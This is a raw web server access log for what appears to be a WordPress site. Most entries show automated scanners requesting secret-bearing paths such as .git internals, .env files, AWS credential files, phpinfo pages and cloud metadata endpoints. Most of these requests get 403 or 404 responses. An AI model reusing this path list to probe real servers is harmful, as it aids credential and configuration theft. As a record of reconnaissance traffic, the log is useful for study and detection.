154.83.103.16 - - [30/Mar/2025:21:14:50 -0400] "GET /.git/description HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:50 -0400] "GET /.git/hooks/post-commit HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:51 -0400] "GET /.git/hooks/pre-commit HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:51 -0400] "GET /.git/hooks/pre-push HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:51 -0400] "GET /.git/index HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:51 -0400] "GET /.git/info/exclude HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:51 -0400] "GET /.git/logs/HEAD HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:52 -0400] "GET /.git/logs/refs/heads/master HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:14:52 -0400] "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:02 -0400] "GET /.git/objects/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:02 -0400] "GET /.git/packed-refs HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:03 -0400] "GET /.git/refs/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:03 -0400] "GET /.git/refs/heads/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:03 -0400] "GET /.git/refs/remotes/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:04 -0400] "GET /.git/refs/stash HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:04 -0400] "GET /.git/refs/tags/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:04 -0400] "GET /.gitattributes HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:05 -0400] "GET /.gitignore HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:14 -0400] "GET /.gitkeep HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:15 -0400] "GET /.gitmodules HTTP/1.1" 404 9427 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:15 -0400] "GET /.travis.yml HTTP/1.1" 404 9420 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:16 -0400] "GET /.vscode/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:16 -0400] "GET /?phpinfo=1 HTTP/1.1" 200 16828 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:21:15:18 -0400] "POST /wp-cron.php?doing_wp_cron=1743383718.7050960063934326171875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
154.83.103.16 - - [30/Mar/2025:21:15:18 -0400] "GET /_phpinfo.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:31 -0400] "GET /_profiler/phpinfo HTTP/1.1" 404 9427 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:32 -0400] "GET /_profiler/phpinfo/info.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
78.153.140.218 - - [30/Mar/2025:21:15:33 -0400] "GET /.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.153.140.218 - - [30/Mar/2025:21:15:33 -0400] "GET /.aws/credentials HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56"
154.83.103.16 - - [30/Mar/2025:21:15:40 -0400] "GET /_profiler/phpinfo/phpinfo.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:41 -0400] "GET /admin/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:41 -0400] "GET /admin/config HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:42 -0400] "GET /admin/controllers/merchant.js HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:43 -0400] "GET /admin/controllers/partner.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:44 -0400] "GET /admin/internal/api HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:44 -0400] "GET /admin/proxy HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:45 -0400] "GET /admin/server_info.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:45 -0400] "GET /api/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:45 -0400] "GET /api/config.env HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:46 -0400] "GET /api/config.js HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:46 -0400] "GET /api/config/config.yml HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:46 -0400] "GET /api/objects/codes.php.save HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:47 -0400] "GET /api/proxy HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:47 -0400] "GET /api/shared/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:48 -0400] "GET /api/shared/config.env HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:48 -0400] "GET /api/shared/config/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
78.153.140.218 - - [30/Mar/2025:21:15:52 -0400] "GET /.env.example HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
78.153.140.218 - - [30/Mar/2025:21:15:53 -0400] "GET /.env.production HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36"
78.153.140.218 - - [30/Mar/2025:21:15:54 -0400] "GET /admin/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070627 Firefox/2.0.0.4"
78.153.140.218 - - [30/Mar/2025:21:15:55 -0400] "GET /api/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.117 Mobile Safari/537.36"
78.153.140.218 - - [30/Mar/2025:21:15:55 -0400] "GET /app/.env HTTP/1.1" 403 1242 "-" "More Safari 3.0.3 user agents strings -->>"
78.153.140.218 - - [30/Mar/2025:21:15:56 -0400] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SPH-M950 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
154.83.103.16 - - [30/Mar/2025:21:15:57 -0400] "GET /api/shared/config/config.env HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
78.153.140.218 - - [30/Mar/2025:21:15:57 -0400] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 9422 "-" "Opera/7.11 (Windows NT 5.0; U) [de]"
154.83.103.16 - - [30/Mar/2025:21:15:58 -0400] "GET /api/v1/proxy HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:58 -0400] "GET /api/v2/proxy HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:15:59 -0400] "GET /apis/config/config.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:00 -0400] "GET /apis/controllers/users.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:01 -0400] "GET /app.js HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:01 -0400] "GET /app.py HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:02 -0400] "GET /app/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:02 -0400] "GET /app/config/parameters.yml HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:09 -0400] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:09 -0400] "GET /application.properties HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:10 -0400] "GET /application/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:10 -0400] "GET /apps/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:10 -0400] "GET /appsettings.json HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:11 -0400] "GET /aws-secret.yaml HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:11 -0400] "GET /aws.yml HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:12 -0400] "GET /aws/credentials HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:13 -0400] "GET /awstats/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:14 -0400] "GET /backend/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:14 -0400] "GET /backend/config/default.yml HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:15 -0400] "GET /backend/config/development.yml HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:21:16:29 -0400] "POST /wp-cron.php?doing_wp_cron=1743383788.0311129093170166015625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
154.83.103.16 - - [30/Mar/2025:21:16:27 -0400] "GET /backend/config/settings.yml HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:30 -0400] "GET /cloud/Scraper.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:30 -0400] "GET /computeMetadata/v1 HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:31 -0400] "GET /computeMetadata/v1beta1 HTTP/1.1" 404 9427 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:31 -0400] "GET /conf/.env HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:44 -0400] "GET /config.env HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:46 -0400] "GET /config.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:46 -0400] "GET /config.json HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:47 -0400] "GET /config/application.yml HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:48 -0400] "GET /config/aws.yml HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:16:50 -0400] "GET /config/config.json HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:00 -0400] "GET /config/constants.js HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:02 -0400] "GET /config/local.yml HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:03 -0400] "GET /config/parameters.yml HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:03 -0400] "GET /config/settings.json HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:17 -0400] "GET /config/settings.local HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:18 -0400] "GET /config/settings.prod HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:19 -0400] "GET /config/storage.yml HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:20 -0400] "GET /configs/routes-4aug.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:21 -0400] "GET /configs/routes.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:21 -0400] "GET /configs/s3_config.json HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:22 -0400] "GET /controller/admin/post.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:23 -0400] "GET /controller/api/post.js HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:24 -0400] "GET /controllers/settings.js HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:25 -0400] "GET /core/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:26 -0400] "GET /crm/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:26 -0400] "GET /cron/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:26 -0400] "GET /dashboard/phpinfo.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:27 -0400] "GET /debug/default/view HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:27 -0400] "GET /dev/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:28 -0400] "GET /development/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:28 -0400] "GET /docker/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:28 -0400] "GET /docker/app/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:28 -0400] "GET /env.backup HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:30 -0400] "GET /env/.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:21:17:30 -0400] "GET /gatsby-config.js HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
